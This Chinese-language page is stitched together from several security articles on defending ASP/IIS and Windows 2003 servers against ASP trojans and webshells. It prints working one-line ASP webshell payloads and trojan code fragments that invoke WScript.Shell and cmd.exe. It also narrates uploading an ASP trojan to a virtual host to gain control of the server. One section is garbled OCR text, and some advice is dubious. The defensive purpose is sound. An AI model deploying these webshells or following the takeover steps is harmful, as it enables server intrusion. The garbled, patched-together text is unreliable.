如何防止ASP木马在服务器上运行
ASP+ACCESS网站安全加固方法汇总

ASP+ACCESS网站安全加固方法汇总本文我将就以ASP+Access为基础构建的网站可能存在的各种安全问题进行汇总讲解,给大家一个宏观上的认识。
攻击方法在黑客学习过程中,我们很容易发现,国内80%的网站几乎使用的都是ASP,而小站的数目远远多于大型网站。
对于小站,若是动态网站,国内普遍采用ASP+Access结构,由于使用者数量众多,具有针对性,这里我们就来详细研究一下ASP+Access网站安全的解决方案。
要建设一个安全的站,我们不能不了解目前针对ASP+Access网站的主流攻击手段,时下的攻击方法有XSS跨站、SQL注入、Cookie欺骗、%5C暴库、上传漏洞等。
下面我们就针对这些问题做出相应对策。
防范措施1)上传漏洞对于上传漏洞,一般的程序员都能做到在前台避免ASP、ASA、CER等类型的文件上传,所以对于前台的问题,这里不再赘述。
如果你没有修补漏洞的能力,服务器安装护卫神入侵防护软件可以封堵此漏洞. 2)XSS跨站针对XSS跨站,最大的作用就是HTML注入和获取Cookie。
我想,更多的人是利用它来获取Cookie,取得Cookie后,目的只有一个,就是看网站是否有漏洞,得以让攻击方通过欺骗的方式进入后台。
对于这种攻击方法,最好的防范措施就是把服务器端的验证改为Session。
3)%5C暴库解决方案一:并不是所有的网站都存在%5C暴库的问题,对于这个问题,我们可以加入ON ERROR RESUME NEXT语句,让程序出错时仍继续向下执行,这样,数据库会相对安全。
比如原来的conn.asp 的文件内容如下:Response.buffer=trueConst conndata=mydata/^%$!%25#%23&%78@data(+.asp'设置数据库路径Const backdata="mydata/#数据库备份#kycpanswpuzg1ok.asp"'设置数据库备份路径mydata="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath(conndata) Set conn=Server.CreateObject("ADODB.Connection")conn.Open mydata为了防止暴库,我们改为如下的形式:Response.buffer=trueConst conndata=mydata/^%$!%25#%23&%78@data(+.asp'设置数据库路径Const backdata="mydata/#数据库备份#kycpanswpuzg1ok.asp"'设置数据库备份路径On Error Resume Nextmydata="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath(conndata) Set conn=Server.CreateObject("ADODB.Connection")conn.Open mydata经过这样的设置后,就可以有效防止这种方法的攻击。
基于ASP木马的攻击与防护

般有 A P H ,J P 多种 脚本 形式 。 S ,P P S 等 国内 的网站 用A P A c s 或 S L S r e 的 占7 % H + y q S + ce s Q e vr 0 ,P P M S l
te h rc r t s fh t c yA PT o n ecnpo rm a S rjn o u e i e n .h n h a e p t f w d h a t i i e t k S rj , rga nA PT oa r r p c l ma dT e e p r us o a c a e sc o t a a b aw a f o s ad t p rr
摘 要: 随着计 算机 网络 的 飞速发展 , 网络 安 全 日益 成 为不 可忽视 的问题 。 如何 防 范 网络 黑客 攻击 , 当今热 f话题 . 是 - j 通 过分 析 A P木 马程 序 的运 行过程 和特 点 ,编写 出符合 自己特殊 要 求的 A P木 马. S S 最终提 出 了通 过修 改服 务 器配 置文件 及相 关组件 来 清除 与防 范 A P木 马的 方法 。 S
一
St w= ra eb e t w c it se 1 ) e s C e t O j c (“ s r p . h l ” S t m - s e e (“ m . x / e u e ”) e c d . x c c d e e c n t s r  ̄
A1I m =c d. td ut r ad 1 na e m s o . e al
smemesrst a c l r ur g is PT oa ytewa f dfigterlt d ls fh re. o aue c n e ada an t 0 og AS rjnb yo i n eae mo ue es vr h mo y h d ot e Ke w r sAS T oa ; t r S c r y y o d : P;rjnNewok;e ui t
常见ASP一句话木马分析及防御

常见ASP一句话木马分析及防御作者:罗婷罗芳来源:《电子技术与软件工程》2013年第22期摘要什么是一句话木马?一句话木马本身并不是任何黑客程序,只是在很多网站上都会使用到的普通代码。
一句话木马只是网络攻击当中的一个小块,但通过对其防御可以大大减少相关的攻击。
【关键词】木马分析木马防御很多制作网站的朋友经常会听到一句话:“我的网站又被一句话木马入侵了。
”但什么是一句话木马?一句话木马本身并不是任何黑客程序,只是在很多网站上都会使用到的普通代码。
但这个代码会给网站打开一个缺口,通过这个缺口黑客可以将真正的木马,也就是通常所说的“大马”注入到网站服务器当中。
“大马”注入到网站服务器后,可通过控制整个网站的所有的源代码,其中程序修改或删除网站的其它内容。
如果一不小心注入的是网站服务器,那么影响的就不是一个网站,而是整个网站服务器上的所有网站。
黑客通常通过google网站查找到全部ASP类型的网站。
然后,在留言板或文章发表区域等可以将内容上传到服务器上的地方输入一句话木马。
也就是想办法将一句话木马程序代码添加到网站的后台数据库。
目前在当下黑客经常使用的ASP一句话木马主要有下面几种:(1)<% execute(request("value")) %>(2)<% execute request("value") %>(3)<% eval request("value ") %>(4)<% eval request(value) %>通过语法变形后还有下列几种:(1)<% If Request("value")<>"" Then Execute(Request("value"))%>(2)(3)<% eval(Request.Item["value"],"unsafe");%>如果再继续完善后,甚至可以绕过网站漏洞筛查程序,在这里不作说明。
服务器防病毒措施

服务器防病毒措施在当前互联网时代,服务器防病毒成为保障信息安全不可或缺的一环。
随着黑客攻击和恶意软件的不断增多,服务器的安全性至关重要。
为了保护服务器免受病毒的威胁,以下是一些有效的服务器防病毒措施。
1. 安装可靠的防病毒软件第一步是确保服务器上安装了可靠的防病毒软件。
这些软件可以及时扫描服务器上的文件和程序,并自动删除或隔离已感染的文件。
及时更新防病毒软件也是很重要的一步,因为新的病毒不断出现,防病毒软件的更新可以保持服务器的最新防护能力。
2. 定期进行系统更新和补丁安装操作系统和软件供应商定期发布操作系统更新和软件补丁,以修复已知的安全漏洞。
定期更新服务器上的操作系统和软件,以确保服务器始终拥有最新的安全防护。
这可以减少黑客攻击和恶意软件利用已知漏洞的风险。
3. 设置强密码和进行多因素身份验证密码是服务器安全的第一道防线。
设置强密码可以大大增加黑客破解密码的难度。
密码应该包括大写字母、小写字母、数字和特殊字符,并且应该定期更改密码。
另外,多因素身份验证也是一个很好的安全措施。
通过结合密码和其他身份验证因素(如指纹识别、短信验证码等),可以增加黑客入侵服务器的难度。
4. 控制访问权限和使用防火墙服务器上的文件和文件夹应该根据需要设置访问权限。
只有授权用户才能访问敏感的数据和文件。
此外,使用防火墙可以帮助筛选和阻止不明来源的网络请求和连接,从而减少服务器受到恶意软件和黑客攻击的风险。
5. 定期备份数据定期备份服务器上的数据是防范病毒攻击的重要手段之一。
如果服务器上的数据被感染或受到破坏,可以通过恢复备份数据来减少损失并快速恢复正常操作。
6. 监控服务器活动定期监控服务器活动可以及时发现异常行为和潜在的病毒感染。
通过使用日志、报警系统和入侵检测软件,可以帮助管理员追踪和阻止病毒攻击。
7. 员工培训和教育服务器安全不仅仅依赖于技术措施,还需要员工的合作。
培训和教育员工有关如何识别和避免病毒感染的最佳实践,可以帮助减少病毒攻击的风险。
Windows 2003下WEB服务器安全设置攻略

一、安装补丁安装好Windows 2003操作系统之后,在托管之前一定要完成补丁的安装,配置好网络后,最好安装上SP1,然后点击开始选择Windows Update,安装所有的关键更新。
二、安装杀毒软件目前的杀毒软件种类很多,其中瑞星、诺顿、卡巴斯基等都是很不错的选择。
不过,也不要指望杀毒软件能够杀掉所有的木马,因为ASP木马的特征是可以通过一定手段来避开杀毒软件的查杀。
三、设置端口保护和防火墙Windows 2003的端口屏蔽可以通过自身防火墙来解决,这样比较好,比筛选更有灵活性,桌面—>网上邻居—>属性—>本地连接—>属性—>高级—>Internet连接防火墙—>设置,把服务器上面要用到的服务端口选中,例如:一台WEB服务器,要提供WEB(80)、FTP(21)服务及远程桌面管理(3389),在“FTP 服务器”、“WEB服务器(HTTP)”、“远程桌面”前面打上对号,如果你要提供服务的端口不在里面,你也可以点击“添加”铵钮来添加,具体参数可以参照系统里面原有的参数。
然后点击确定。
注意:如果是远程管理这台服务器,请先确定远程管理的端口是否选中或添加。
1、权限设置的原理1)WINDOWS用户,在WINNT系统中大多数时候把权限按用户(組)来划分。
在开始→程序→管理工具→计算机管理→本地用户和组,管理系统用户和用户组。
2)NTFS权限设置,请记住分区的时候把所有的硬盘都分为NTFS分区,然后我们可以确定每个分区对每个用户开放的权限。
文件(夹)上右键→属性→安全,在这里管理NTFS文件(夹)权限。
3)IIS匿名用户,每个IIS站点或者虚拟目录,都可以设置一个匿名访问用户(现在暂且把它叫“IIS匿名用户”),当用户访问你的网站的.ASP文件的时候,这个.ASP文件所具有的权限,就是这个“IIS匿名用户”所具有的权限。
2、权限设置——磁盘权限系统盘及所有磁盘只给Administrators组和SYSTEM的完全控制权限系统盘\Documents and Settings目录只给Administrators组和SYSTEM的完全控制权限系统盘\Documents and Settings\All Users目录只给Administrators组和SYSTEM的完全控制权限系统盘\Inetpub目录及下面所有目录、文件只给Administrators组和SYSTEM的完全控制权限系统盘\Windows\System32\cacls.exe、cmd.exe、net.exe、net1.exe文件只给Administrators组和SYSTEM的完全控制权限四、禁用不必要的服务开始菜单—>管理工具—>服务Print SpoolerRemote RegistryTCP/IP NetBIOS HelperServer以上是在Windows Server 2003系统上面默认启动的服务中禁用的,默认禁用的服务如没特别需要的话不要启动。
如何防止黑客谋取虚拟主机权限

如何防止黑客谋取虚拟主机权限随着网络的飞速发展,很多中小型企业都想拥有自己的网站,但是,如果想运行网站最起码也要拥有虚拟主机。
虚拟主机的管理也是比较复杂的,一个虚拟主机站点被黑客入侵,其结果往往是其他用户的站点一起遭殃,甚至被攻下整台服务器。
专职优化、域名注册、网站空间、虚拟主机、服务器托管、vps主机、服务器租用的中国信息港以专业的水准来为你做详细的分析!攻:轻松渗透,客户升级为系统管理员一台权限设置严密的服务器可以保证每个虚拟主机的安全。
然而,随着网络的发展,虚拟主机也越来越平民化,一些专为架设虚拟主机而编写的管理系统也如雨后春笋般出现。
即便是一个只懂简单系统维护的菜鸟网管,也可以通过使用虚拟主机管理系统将一台普通服务器变成虚拟主机服务器。
可是这些菜鸟网管往往忘了虚拟主机最重要的组成部分,从而产生一个严重的安全隐患——权限设置不严的虚拟主机。
一、权限设置不严,系统暴露无遗如今很多虚拟主机服务器使用的都是Windows系统,管理员只在服务器上安装了虚拟主机系统,或者在安装完虚拟主机系统后进行了简单的安全设置,这都是不够的。
我们可以在自己的虚拟主机中上传ASP木马或PHP木马,从而获得服务器的一个Webshell,对于权限设置简陋的服务器,我们还可以使用管理员权限执行任意命令,从而完全渗透服务器,获取虚拟主机服务器的控制权。
1、注册一个虚拟主机我们先在虚拟主机服务商处注册一个FTP帐号名为piao,FTP密码为piaohubuding的虚拟主机用户(一般虚拟主机服务商都提供其虚拟主机产品的试用,可以利用这段时间测试一下服务器的安全性),注册完毕后获得一个二级域名piao.w12.***.com(如图1),使用FTP软件将网页上传到虚拟主机,然后输入获得的二级域名就可以访问我们的网站了。
图1 成功注册虚拟主机2、上传ASP木马将一个asp木马上传到测试虚拟主机,这里以海阳顶瑞网的ASP木马2006版为例,上传完毕后在浏览器中输入 http://piao.w12.***.com/2006.asp,出现ASP 木马的登陆界面(海阳顶瑞网ASP木马已经被各大杀毒软件查杀,可以正常运行,表示服务器没有安装任何杀毒软件,可见服务器管理员的安全意识不高)。
浅谈网站的安全性

浅谈网站的安全性发表时间:2011-07-29T10:50:33.700Z 来源:《魅力中国》2011年6月上供稿作者:周露水[导读] 目前,网站被黑事件频发,地方政府网站被频频挂马,雅虎HotJobs网站发现脚本攻击漏洞。
周露水[周露水(1984——),江西南昌人,江西外语外贸职业学院教师,网络工程师,主要研究方向:计算机网络。
](江西外语外贸职业学院江西南昌 330099)中图分类号:TP30 文献标识码:A 文章编号:1673-0992(2011)06-0000-01摘要:目前,网站被黑事件频发,地方政府网站被频频挂马,雅虎HotJobs网站发现脚本攻击漏洞。
网站安全问题越来越严重。
作为网站程序设计者的开发管理和网站管理员,必须增强安全意识,重视网站安全,降低网站被黑客入侵的危险。
但是网站的安全问题涉及到很多方面,本文从服务器安全、账号安全和脚本安全的这三个角度论述如何加强网站的安全性能。
关键字:网站安全;服务器安全;账号安全;脚本安全随着互联网的蓬勃发展,网站数量的增加,网站的安全问题也随之而来,并逐渐成为学校、企事业单位和政府部门网络应用所面临的主要问题。
但是一个网站的安全问题可能从多方面而来。
光是任何一方面,都不可能保证绝对的安全。
一个安全的网站,必须要各方面配合。
这些方面包括物理安全、操作系统安全、应用程序安全、管理安全等很多方面。
这里我们仅从以下三个角度来谈网站的安全问题一、服务器安全首当其冲的是服务器的安全,服务器本身如果被人入侵了,你的网站系统再安全,那也没有任何作用。
为了确保服务器的安全首先要在本地文件格式上做文章,即将FAT格式转换为安全系数更高的NTFS文件格式。
毕竟对于黑客来说存储在FAT格式的磁盘分区里的数据要比存储在NTFS格式的磁盘分区的数据更容易访问,也更容易破坏,另外目前所有安全软件及加密软件也都是针对NTFS格式来说的,对FAT格式的保护非常薄弱。
其次对服务器数据进行数据备份。
ASP木马Webshell的安全防范解决办法

ASP木马Webshell的安全防范解决办法注意:本文所讲述之设置方法与环境:适用于Microsoft Windows 2000 Server/Win2003 SERVER | IIS5.0/IIS6.01、首先我们来看看一般ASP木马、Webshell所利用的ASP组件有那些?我们以海洋木马为列:shellStr=“Shell”applicationStr=“Application”if cmdPath=“wscriptShell”set sa=server.createObject(shellStr&”.”&applicationStr)set streamT=server.createObject(“adodb.stream”)set domainObject = GetObject(“WinNT://.”)以上是海洋中的相关代码,从上面的代码我们不难看出一般ASP木马、Webshell主要利用了以下几类ASP组件:①WScript.Shell (classid:72C24DD5-D70A-438B-8A42-98424B88AFB8)②WScript.Shell.1 (classid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B)③work (classid:093FF999-1EA0-4079-9525-9614C3504B74)④work.1 (classid:093FF999-1EA0-4079-9525-9614C3504B74)⑤FileSystem Object (classid:0D43FE01-F093-11CF-8940-00A0C9054228)⑥Adodb.stream (classid:{00000566-0000-0010-8000-00AA006D2EA4})⑦Shell.applicaiton....hehe,这下我们清楚了危害我们WEB SERVER IIS的最罪魁祸首是谁了!!开始操刀,come on... 2:解决办法:①删除或更名以下危险的ASP组件:WScript.Shell、WScript.Shell.1、work、work.1、adodb.stream、Shell.application开始------->运行--------->Regedit,打开注册表编辑器,按C将用到,所以如果你的服务器是开虚拟主机的话,建议酢情处理。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
如何防止ASP木马在服务器上运行希望需要的人能用得上!喜欢的就帮忙顶一下了!如果您的服务器正在受ASP木马的困扰,那么希望这篇文章能帮您解决您所面临的问题。
目前比较流行的ASP木马主要通过三种技术来进行对服务器的相关操作。
一、使用FileSystemObject组件FileSystemObject可以对文件进行常规操作可以通过修改注册表,将此组件改名,来防止此类木马的危害。
HKEY_CLASSES_ROOT\Scripting.FileSystemObject\改名为其它的名字,如:改为FileSystemObject_ChangeName自己以后调用的时候使用这个就可以正常调用此组件了也要将clsid值也改一下HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID\项目的值也可以将其删除,来防止此类木马的危害。
注销此组件命令:RegSrv32 /u C:\WINNT\SYSTEM\scrrun.dll禁止Guest用户使用scrrun.dll来防止调用此组件。
使用命令:cacls C:\WINNT\system32\scrrun.dll /e /d guests二、使用WScript.Shell组件WScript.Shell可以调用系统内核运行DOS基本命令可以通过修改注册表,将此组件改名,来防止此类木马的危害。
HKEY_CLASSES_ROOT\WScript.Shell\及HKEY_CLASSES_ROOT\WScript.Shell.1\改名为其它的名字,如:改为WScript.Shell_ChangeName或WScript.Shell.1_ChangeName自己以后调用的时候使用这个就可以正常调用此组件了也要将clsid值也改一下HKEY_CLASSES_ROOT\WScript.Shell\CLSID\项目的值HKEY_CLASSES_ROOT\WScript.Shell.1\CLSID\项目的值也可以将其删除,来防止此类木马的危害。
三、使用Shell.Application组件Shell.Application可以调用系统内核运行DOS基本命令可以通过修改注册表,将此组件改名,来防止此类木马的危害。
HKEY_CLASSES_ROOT\Shell.Application\及HKEY_CLASSES_ROOT\Shell.Application.1\改名为其它的名字,如:改为Shell.Application_ChangeName或Shell.Application.1_ChangeName自己以后调用的时候使用这个就可以正常调用此组件了也要将clsid值也改一下HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值也可以将其删除,来防止此类木马的危害。
禁止Guest用户使用shell32.dll来防止调用此组件。
使用命令:cacls C:\WINNT\system32\shell32.dll /e /dguests注:操作均需要重新启动WEB服务后才会生效。
四、调用Cmd.exe禁用Guests组用户调用cmd.execacls C:\WINNT\system32\Cmd.exe /e /d guests通过以上四步的设置基本可以防范目前比较流行的几种木马,但最有效的办法还是通过综合安全设置,将服务器、程序安全都达到一定标准,才可能将安全等级设置较高,防范更多非法入侵。
下面文章是我在站长站论坛里面看到的发给需要的人参考!Win2003 Server安全配置完整篇Win2003 Server安全配置完整篇2006-11-01 07:41 本文详细介绍了Windows Server 2003中的安全配置问题,包括端口、审核、默认共享、磁盘管理以及防火墙和数据库等方面,相信会让你有所收获。
一、先关闭不需要的端口我比较小心,先关了端口。
只开了3389 21 80 1433有些人一直说什么默认的3389不安全,对此我不否认,但是利用的途径也只能一个一个的穷举爆破,你把帐号改了密码设置为十五六位,我估计他要破上好几年,哈哈!办法:本地连接--属性--Internet协议(TCP/IP)--高级--选项--TCP/IP筛选--属性--把勾打上,然后添加你需要的端口即可。
PS一句:设置完端口需要重新启动!当然大家也可以更改远程连接端口方法:Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]"PortNumber"=dword:00002683保存为.REG文件双击即可!更改为9859,当然大家也可以换别的端口,直接打开以上注册表的地址,把值改为十进制的输入你想要的端口即可!重启生效!还有一点,在2003系统里,用TCP/IP筛选里的端口过滤功能,使用FTP服务器的时候,只开放21端口,在进行FTP传输的时候,FTP 特有的Port模式和Passive模式,在进行数据传输的时候,需要动态的打开高端口,所以在使用TCP/IP过滤的情况下,经常会出现连接上后无法列出目录和数据传输的问题。
所以在2003系统上增加的windows连接防火墙能很好的解决这个问题,所以都不推荐使用网卡的TCP/IP过滤功能。
所做FTP下载的用户看仔细点,如果要关闭不必要的端口,在\\system32\\drivers\\etc\\services中有列表,记事本就可以打开的。
如果懒惰的话,最简单的方法是启用WIN2003的自身带的网络防火墙,并进行端口的改变。
功能还可以!Internet 连接防火墙可以有效地拦截对Windows 2003服务器的非法入侵,防止非法远程主机对服务器的扫描,提高Windows 2003服务器的安全性。
同时,也可以有效拦截利用操作系统漏洞进行端口攻击的病毒,如冲击波等蠕虫病毒。
如果在用Windows 2003构造的虚拟路由器上启用此防火墙功能,能够对整个内部网络起到很好的保护作用。
二、关闭不需要的服务打开相应的审核策略我关闭了以下的服务Computer Browser 维护网络上计算机的最新列表以及提供这个列表Task scheduler 允许程序在指定时间运行Messenger 传输客户端和服务器之间的 NET SEND 和警报器服务消息Distributed File System: 局域网管理共享文件,不需要禁用Distributed linktracking client:用于局域网更新连接信息,不需要禁用Error reporting service:禁止发送错误报告Microsoft Serch:提供快速的单词搜索,不需要可禁用NTLMSecuritysupportprovide:telnet服务和Microsoft Serch用的,不需要禁用PrintSpooler:如果没有打印机可禁用Remote Registry:禁止远程修改注册表Remote Desktop Help Session Manager:禁止远程协助Workstation 关闭的话远程NET命令列不出用户组把不必要的服务都禁止掉,尽管这些不一定能被攻击者利用得上,但是按照安全规则和标准上来说,多余的东西就没必要开启,减少一份隐患。
在"网络连接"里,把不需要的协议和服务都删掉,这里只安装了基本的Internet协议(TCP/IP),由于要控制带宽流量服务,额外安装了Qos数据包计划程序。
在高级tcp/ip设置里--"NetBIOS"设置"禁用tcp/IP上的NetBIOS(S)"。
在高级选项里,使用"Internet连接防火墙",这是windows 2003 自带的防火墙,在2000系统里没有的功能,虽然没什么功能,但可以屏蔽端口,这样已经基本达到了一个IPSec的功能。
在运行中输入gpedit.msc回车,打开组策略编辑器,选择计算机配置-Windows设置-安全设置-审核策略在创建审核项目时需要注意的是如果审核的项目太多,生成的事件也就越多,那么要想发现严重的事件也越难当然如果审核的太少也会影响你发现严重的事件,你需要根据情况在这二者之间做出选择。
推荐的要审核的项目是:登录事件成功失败账户登录事件成功失败系统事件成功失败策略更改成功失败对象访问失败目录服务访问失败特权使用失败三、关闭默认共享的空连接删除默认共享通过修改注册表的方式取消它:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Par ameters:AutoShareServer类型是REG_DWORD把值改为0即可默认情况下,任何用户通过空连接连上服务器,进而枚举出帐号,猜测密码。
我们可以通过修改注册表来禁止建立空连接:Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 的值改成”1”即可。